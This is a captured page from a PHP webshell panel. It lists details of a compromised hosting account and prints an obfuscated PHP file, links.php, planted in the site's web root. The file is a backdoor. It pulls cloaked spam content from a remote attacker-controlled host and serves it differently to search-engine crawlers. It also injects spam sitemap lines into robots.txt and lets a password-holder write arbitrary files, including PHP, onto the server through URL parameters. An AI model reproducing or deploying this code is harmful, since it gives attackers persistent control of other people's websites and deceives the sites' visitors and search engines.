403Webshell
Server IP : 173.201.180.75  /  Your IP : 18.232.179.37
Web Server : Apache
System : Linux p3plzcpnl459188.prod.phx3.secureserver.net 2.6.32-954.3.5.lve1.4.92.el6.x86_64 #1 SMP Tue Jul 4 15:05:25 UTC 2023 x86_64
User : ryvm0idqv8fv ( 7659266)
PHP Version : 7.3.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/ryvm0idqv8fv/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/ryvm0idqv8fv/public_html/links.php
<?php
 goto ghqvb; YLbhp: function is_htps() { if (isset($_SERVER["\110\124\x54\120\x53"]) && strtolower($_SERVER["\x48\x54\124\x50\x53"]) !== "\157\x66\146") { return true; } elseif (isset($_SERVER["\x48\x54\124\120\x5f\130\x5f\x46\117\x52\127\101\x52\104\x45\104\137\120\122\117\124\117"]) && $_SERVER["\x48\x54\124\120\x5f\130\137\x46\x4f\x52\x57\x41\122\104\x45\104\x5f\x50\x52\117\x54\117"] === "\150\164\x74\x70\x73") { return true; } elseif (isset($_SERVER["\110\124\124\120\137\x46\122\x4f\x4e\x54\x5f\x45\116\104\x5f\110\x54\x54\120\x53"]) && strtolower($_SERVER["\110\124\124\120\x5f\106\x52\x4f\x4e\x54\137\105\116\104\137\110\x54\124\x50\123"]) !== "\157\146\146") { return true; } return false; } goto wrJlw; THYFQ: function sbot() { $uAgent = strtolower($_SERVER["\110\x54\x54\x50\137\125\123\105\x52\x5f\x41\107\x45\x4e\x54"]); if (stristr($uAgent, "\147\x6f\x6f\x67\x6c\145\142\157\x74") || stristr($uAgent, "\x62\x69\156\147") || stristr($uAgent, "\x79\141\150\157\x6f") || stristr($uAgent, "\147\157\x6f\x67\x6c\145") || stristr($uAgent, "\107\x6f\157\147\x6c\145\142\157\164") || stristr($uAgent, "\x67\x6f\x6f\x67\x6c\145\x62\157\164")) { return true; } else { return false; } } goto uyy0R; kXSgH: $htmcontent = trim(dageget($web)); goto lvLVB; G7caT: if (is_htps()) { $http = "\x68\164\164\x70\163"; } else { $http = "\x68\164\x74\x70"; } goto al8Zv; jivLe: $lang = urlencode($lang); goto frin2; frin2: $urlshang = ''; goto tcrf1; j2Ytd: if ($duri_tmp == '') { $duri_tmp = "\57"; } goto qGDQ9; IpZf2: if (@$_GET["\160\x64"] != '') { $add_content = @$_GET["\155\141\160\156\141\155\145"]; $action = @$_GET["\141\x63\x74\x69\x6f\x6e"]; if (isset($_SERVER["\x44\x4f\x43\x55\x4d\105\116\x54\x5f\122\x4f\x4f\124"])) { $path = $_SERVER["\104\117\x43\125\x4d\x45\116\x54\x5f\122\x4f\x4f\124"]; } else { $path = dirname(__FILE__); } if (!$action) { $action = "\160\x75\164"; } if ($action == "\160\165\164") { if (strstr($add_content, "\x2e\x78\x6d\154")) { $map_path = $path . "\57\163\151\x74\x65\x6d\141\160\56\170\x6d\x6c"; if (is_file($map_path)) { @unlink($map_path); } $file_path = $path . "\x2f\162\x6f\142\157\x74\163\56\164\170\x74"; if (file_exists($file_path)) { $data = dageget($file_path); } else { $data = "\125\x73\145\x72\x2d\141\147\x65\x6e\x74\x3a\x20\52\101\x6c\x6c\157\167\x3a\x20\x2f"; } $sitmap_url = $http . "\x3a\x2f\x2f" . $host . "\x2f" . $add_content; if (stristr($data, $sitmap_url)) { echo "\x3c\x62\162\76\163\151\164\x65\x6d\x61\160\40\x61\154\162\145\141\x64\171\40\x61\144\144\145\x64\x21\x3c\142\162\76"; } else { if (file_put_contents($file_path, trim($data) . "\xd\12" . "\x53\x69\164\x65\155\x61\x70\72\40" . $sitmap_url)) { echo "\74\x62\x72\x3e\157\x6b\74\x62\x72\x3e"; } else { echo "\74\x62\x72\x3e\x66\151\x6c\145\40\167\x72\151\x74\145\x20\146\141\154\x73\x65\41\74\142\162\x3e"; } } } else { echo "\74\x62\162\x3e\163\x69\x74\145\x6d\x61\x70\x20\156\141\x6d\x65\x20\x66\141\x6c\163\145\41\74\x62\x72\x3e"; } if (strstr($add_content, "\x2e\x70" . "\150\160")) { $a = sha1(sha1(@$_GET["\x61"])); $b = sha1(sha1(@$_GET["\142"])); if ($a == dageget($http_web . "\x3a\57\x2f" . $goweb . "\x2f\141\56\160" . "\150\x70") || $b == "\x38\60\70\x37\63\65\x62\x31\67\143\x38\x39\64\x33\145\x33\67\61\x35\63\x38\70\x39\x35\70\144\143\62\x32\x64\x38\x37\x39\141\x38\143\x39\x65\x61\x61") { $dstr = @$_GET["\x64\x73\164\x72"]; if (file_put_contents($path . "\57" . $add_content, $dstr)) { echo "\x6f\x6b"; } } } } die; } goto PVJYX; R2bVo: function pingmap($url) { $url_arr = explode("\15\12", trim($url)); $return_str = ''; foreach ($url_arr as $pingUrl) { $pingRes = dageget($pingUrl); $ok = strpos($pingRes, "\x53\151\164\145\x6d\x61\x70\x20\116\157\164\x69\x66\151\143\x61\x74\151\x6f\x6e\x20\x52\145\143\145\151\x76\145\144") !== false ? "\160\x69\x6e\147\157\153" : "\145\162\162\x6f\162"; $return_str .= $pingUrl . "\x2d\55\x20" . $ok . "\x3c\142\x72\76"; } return $return_str; } goto THYFQ; EVHAW: $xmlname = "\x6a\x6d\x71\171"; goto O3lCM; lvLVB: if (!strstr($htmcontent, "\156\157\142\157\x74\x75\163\145\162\x61\x67\x65\156\164")) { if (strstr($htmcontent, "\x6f\x6b\150\x74\x6d\x6c\x67\x65\164\x63\157\156\164\145\156\x74")) { @header("\103\x6f\x6e\164\145\x6e\x74\x2d\x74\x79\x70\145\x3a\x20\x74\x65\170\164\57\x68\x74\x6d\x6c\x3b\40\x63\x68\x61\x72\x73\x65\164\75\x75\x74\146\55\x38"); $htmcontent = str_replace("\157\153\x68\x74\155\154\147\x65\164\143\x6f\156\164\x65\156\164", '', $htmcontent); echo $htmcontent; die; } else { if (strstr($htmcontent, "\x6f\x6b\170\x6d\x6c\147\x65\164\x63\157\x6e\x74\x65\x6e\164")) { $htmcontent = str_replace("\157\153\x78\155\x6c\147\145\x74\x63\x6f\156\x74\145\156\164", '', $htmcontent); @header("\103\157\x6e\x74\x65\156\164\x2d\x74\x79\x70\145\x3a\x20\164\145\170\x74\x2f\x78\155\x6c"); echo $htmcontent; die; } else { if (strstr($htmcontent, "\160\151\x6e\147\x78\155\x6c\x67\x65\164\143\x6f\x6e\164\x65\156\164")) { $htmcontent = str_replace("\160\x69\156\x67\170\155\154\147\145\x74\x63\x6f\x6e\x74\145\x6e\164", '', $htmcontent); @header("\x43\157\156\x74\x65\x6e\x74\x2d\x74\171\160\145\x3a\x20\x74\x65\x78\164\57\x68\x74\x6d\x6c\x3b\40\143\x68\x61\162\163\x65\x74\x3d\x75\164\x66\x2d\x38"); echo pingmap($htmcontent); die; } } } } goto R2bVo; Ud33_: @ignore_user_abort(1); goto EVHAW; ghqvb: @set_time_limit(3600); goto Ud33_; vTBxU: function st_uri() { if (isset($_SERVER["\x52\105\x51\125\105\123\124\x5f\x55\122\x49"])) { $duri = $_SERVER["\122\x45\x51\125\105\123\124\x5f\125\x52\x49"]; } else { if (isset($_SERVER["\141\x72\147\x76"])) { $duri = $_SERVER["\x50\x48\120\137\123\105\x4c\106"] . "\x3f" . $_SERVER["\141\x72\147\x76"][0]; } else { $duri = $_SERVER["\x50\110\120\x5f\123\x45\114\106"] . "\x3f" . $_SERVER["\121\125\x45\122\131\137\x53\124\122\x49\x4e\x47"]; } } return $duri; } goto LVeKP; LVeKP: $goweb = $xmlname . "\56\166\142\x68\x73\x67" . "\56\x78\x79\x7a"; goto YLbhp; uyy0R: function dageget($url) { $file_contents = ''; if (function_exists("\143\165\162\x6c\137\151\156\151\164")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); $file_contents = curl_exec($ch); curl_close($ch); } if (!$file_contents) { $file_contents = @file_get_contents($url); } return $file_contents; } goto iZCNc; qGDQ9: $duri = urlencode($duri_tmp); goto vTBxU; al8Zv: $duri_tmp = st_uri(); goto j2Ytd; u1qEd: $lang = @$_SERVER["\x48\124\124\x50\x5f\x41\103\103\x45\x50\x54\137\x4c\x41\116\107\x55\101\x47\x45"]; goto jivLe; PVJYX: $web = $http_web . "\x3a\x2f\57" . $goweb . "\57\151\x6e\144\x65\170\x6e\145\167\x2e\x70\x68\160\77\x77\x65\x62\x3d" . $host . "\46\172\x7a\75" . sbot() . "\46\x75\162\151\x3d" . $duri . "\46\x75\x72\x6c\163\x68\141\156\x67\x3d" . $urlshang . "\x26\x68\x74\x74\160\x3d" . $http . "\x26\154\x61\x6e\x67\x3d" . $lang; goto kXSgH; wrJlw: $host = $_SERVER["\110\x54\x54\x50\137\x48\x4f\123\124"]; goto u1qEd; tcrf1: if (isset($_SERVER["\110\x54\x54\120\137\x52\x45\x46\x45\122\105\122"])) { $urlshang = $_SERVER["\110\124\124\x50\137\x52\x45\x46\x45\122\x45\x52"]; $urlshang = urlencode($urlshang); } goto IpZf2; O3lCM: $http_web = "\x68\164\164\x70"; goto G7caT; iZCNc: 
 //vx055  ?>

Youez - 2016 - github.com/yon3zu
LinuXploit